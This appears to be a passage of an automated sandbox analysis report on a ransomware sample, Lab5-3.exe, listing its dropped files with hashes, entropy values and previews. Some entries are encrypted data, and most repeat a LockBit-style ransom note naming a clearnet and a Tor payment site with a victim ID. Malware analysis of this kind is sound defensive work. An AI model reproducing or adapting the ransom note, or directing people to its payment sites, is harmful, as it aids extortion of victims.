                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.924291165570511
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wbFuJLM54vXY1JGU8x+3rf17nggtHfUTid3hBaUoSGFcmeykEdEElU92i:wb0xvI+UO+3rN7nJGGx0uKeY2ElUJ
                                                                                                          MD5:E811BC3A59F1A2243ECFDCD73B326398
                                                                                                          SHA1:A10B52CBA07729BB66544BA802584AC9D9BF67AD
                                                                                                          SHA-256:AFFF5FA581EC6DAE1049916AA46ACD605D9610A8A260E6A4B1910F45EE872DF1
                                                                                                          SHA-512:8F4595AD618015E4F6743B754274F52F72A3DD5E00B63AEEBFC69DC53EBDEA9A5FFE51688BA8A29532228CE61849F08EE9911EE84B5F5B64B5BEC23C4D32FBD4
                                                                                                          Malicious:false
                                                                                                          Preview:.xiBI`......_C.B.aY../.k./.%<.1#....].$........A....!.Y\L..L...'=...`}V.....p..=..,.^_...t....%.x.{DHj....L..x...z.1...(..Jxe.>o....W.(......./.S..s..$Wf.m.5..S.l.(b..t..%..w;.Mwy.A....^.....].t...b..........0.........\u.9h<.j..E....q....qbd.s.[.%..M{].c....yw...!...o...[.%~_yq....R....2.......O...u..v.Yb...a.L.;.l.RA...gw.=.l....<,L..?v:..{J...d<6..?...ct.,...L....~......<E.!,...2...U.p....".~.._8N./.......'.....n;F.[...k.....n...mc.s.&I......kPSH.+B.[....%I....*...C......gM%.B.bj..?._#X...E..b'..RM.A>..s..+.;..&@>#.@S...0..4jn.....8...u.U..8.U.^'2F.t.l...4....-.C.=N....n..'...M)g.3.>B......t.6..;.OEJn -..#..`<.+.G.\.._......0..8Zg..'.gl#<...K......iG\C.G..]E.,.B..........T.s.c..R.....9:.de..F...l.....M|..73.ud.J.779F.l>.E.`..K]"...xH....J....B..>...V.Ry.&W.jv.l....I...*..]......E.8..:,2..d.z.m..w+\.*.....3......7...?6j.`gTwIe.~.0.{(...{"QuO).S..B...(.T*..l..:|....z.Ef...W%.[.7.>...M...[1.fF[q............~.HR..........g..uKl...7fW..../
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.934768947048211
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gtQAuu7dzHioU6sCxORV8QpNHHfUTid3hBaUoSGFcmeykEdEElU92i:1JulHR7Q8MyGx0uKeY2ElUJ
                                                                                                          MD5:FB20D6B147825B40C6669887E36E0260
                                                                                                          SHA1:4A4B1D0434DE4F6FDB775AA6039CCB16040BADBD
                                                                                                          SHA-256:3D4CBEB7BB03BF7BF50FAE7BAB11B88DBAF57E172A7AFDD8A8622A4D720547AC
                                                                                                          SHA-512:594901DABE514D3975444CA2EF40281B36A209DA76E5FAB25BD382632FF373230856C4859F0194359C56413862416981EF2038C02899EEA51867455AE70BC8F0
                                                                                                          Malicious:false
                                                                                                          Preview:..u0.S.J........b.. S~n.3...c0^....7......R..(..+BM..Y.A..q...." =..$....A.'........P1;h[..k.IcUW....c....g.6+P..Y ..zW*..h.9.[...'..N........4.-..7..h=..5.VT...SL..@.....l7..d.zF.# ..-....8%..~.3.j.V..(....K..2+..n%.~..-...'/Js...Y.!.......m.iz.@1..a6.*#...^...o.M.%.\.0.....xT..(]..-....C.._@c1D..P.....}.S=....#...?.=.9.].#.U..\K0!..C.J....1.,f........uT...A.....R....,.oEQK.L.._.....N. w.?8...C....!.v]=....ux....n.......SW8...A..qA.}..d3C..8.k.).t.....u..I..K...|.Bj<|.5.>...9Bh..E......._.p^m.aI.0..-..>oF.Lkvx.*....".y.a.@..2..9.0....d.Vj....P.....[..u..*W657.].3..[...X"..+.4..J.L.....F..}.......<z.g.R.'..j.`..V`&.f.^=.... .{&.....A.Q.s.f.....v.\.\.;R.p...!Sm...8...%...2.B..dF*..{ZS./RM..m.c.....=..:t.MY.X./.kW.*.`E?.$....[..=&...........S~....Q.2.i.C.....#.#]<......%.k......9......FA....,s....a...*......L.D".y..v...?n...g....0..@I....../..Z..N..bW.O.8....9...5.1......P4gP...f....9..'..|n.0C...>..O._{..v..R..V.l.FY.j......U.m....w..Q{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2496
                                                                                                          Entropy (8bit):7.927479699286047
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Rbj0Qa7PWBh+QLUAs09FOYEHfUTid3hBaUoSGFcmeykEdEElU92i:SQa7PWmQ3lGx0uKeY2ElUJ
                                                                                                          MD5:BF17185227A91A1224FCCDDFA621E0D8
                                                                                                          SHA1:A8101B0D0D97857905C2F20207EA0BC3B36C4F06
                                                                                                          SHA-256:1B8C56F7802F55AC1190B256D2FAE668A127263F3BA361BA9F34E4CAF0331FEE
                                                                                                          SHA-512:5D8D36C4E4799E7A113D24C985915D5326191F02A4664B3F773BDD557E54C0CB198741925A76A05C469E72E71C58E8EF6F94B4E7B93E92A9834F0F637D59ED9B
                                                                                                          Malicious:false
                                                                                                          Preview:..GQ9'.".l..7...../p_....p..F<~d..DIRK..`..4...S:.ga...-.W.l..%(>.s...?I=.....m.%&.....B...~M.I...N....9N..$..;.D......m:.^.....%M.|...D..E..=......X...fe.B..kD>.L....HTb.....:I*.0.A.'..F4e.!...L.q.~..>.y.\>.......<o.....k.aO..cd..5.f.O.1<..9..,a.f.X.Dq......Ma..W....?..L..H..$K..C..3b.A9 ............j..'k..s.e 0c..}c......>.5+...Zs.".W7.._.Mw.A\t.~O............#...+g..b...Z........#/~w..B....ua#]..Y~E.B_..9ev..*...j.i/{qB~m..w./..[:|.P...#.=.X.^L.UGlX..y..L..~j)..N..z..S\......*.!...#.....J.......u[).O.S.].v..........$.....`..B..S..X..m%....<...1m..@.....y.+..."....Z.IR.I.........(e.;..`."n........]...R..V.>.....C......t.:..2....t...~H..P..k*>.H5...`.~m..X.V.....s.. .5v.Z._.!.\..Ma|...,...} .Y....|.d3e.(.....U.....!..\.U..c...@..wG../....q......#.c....4....T..1...w...:..'>..x.3q.....i.../[{.vG9*./k..;O...]....F.....n.Dq.....9......v..a.e%-EDhg....a..0\....RT\}AA}%.BE...a.V..at-D(.qC..,...tG..~.8..U0.....n.....A.]#.h...+..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2496
                                                                                                          Entropy (8bit):7.919321284646369
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dvXV8l9CZH1I0fACxhFZOMQvVzHfUTid3hBaUoSGFcmeykEdEElU92i:ZXCAd1IaAghFZRXGx0uKeY2ElUJ
                                                                                                          MD5:127ED857597FE178A1A14B94CC18F7C1
                                                                                                          SHA1:32DF9877AE1F9E82EEC0DCF893D7D21A60E5EEFF
                                                                                                          SHA-256:D80CA4230A0F610BE3761FFDEFA9D85BC98049965F6C1956D8ED9AA234ED35F6
                                                                                                          SHA-512:BF47AB04313B25E1B895D9D3FFA658E98CC1B681BFE025180B71AB35E80B96E577817D8C491C67879A33D26CD76631224231DAD00EF92C450DE9A2192B70B83F
                                                                                                          Malicious:false
                                                                                                          Preview:..QXO.g....e.k..G.C.l...~Y}.r|8.Sk.]q..Z..=x.k..#...7...&.J%}~.}.nHpT.!yZH..Q*F..Y{%J.H..j.[.|.>.NP.....T.uu9R...a.FJ...[.kh^.....X.P.8.."}.&.Y=.(...|+..|vS.(H.IWT.g.'..D.f.E..../.n...!......K.M.+z..........R2i~Z....'a.PQ.Kot....+zf...C.~.i.?qmb..^5.c.b......y|.._0.vi.N..Z.,..*.G.;`..o.X.....v....i...).|...'.K.j...:..;..a,.[..Qy@.Jd-.o5.BZ_.j...X......v...&.bRY.".S#......W.bB'..4r.JR....i`.>'QIp.K....+ ....5......A..|..>....v....!.v6..o5;O.U...(}.....=..i...@..j..2G.^...%0PH...e..A.,...I.m.. ..].}S(O.^M...^.0.|.R.0......w(."...-I..@..Cg.8.......}...>]..4.V..D.....?..l.."..r..e....b'.J,|P..0):.30F.X....I}.X.?#.K.h i.H.V...cT.l&..P..,.H..r..'.:.V.....I0A.X.-7../.6tFa....A.Es.....;...;.$......-e.=_.f.-Q.}...B.=3D......*4P..r...4em...^ u....n.)..9..e?..r.q.D.....X....r.>P.......0).2.=l;...U......^U1.<.Q.jT.K.....w..5.~.)...........&.|....=....Aq.V.VS.A`I.k...........|.f...xV.b...3..I...K...y...."...{."N.A..8..dj..$....z...N..Ny.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
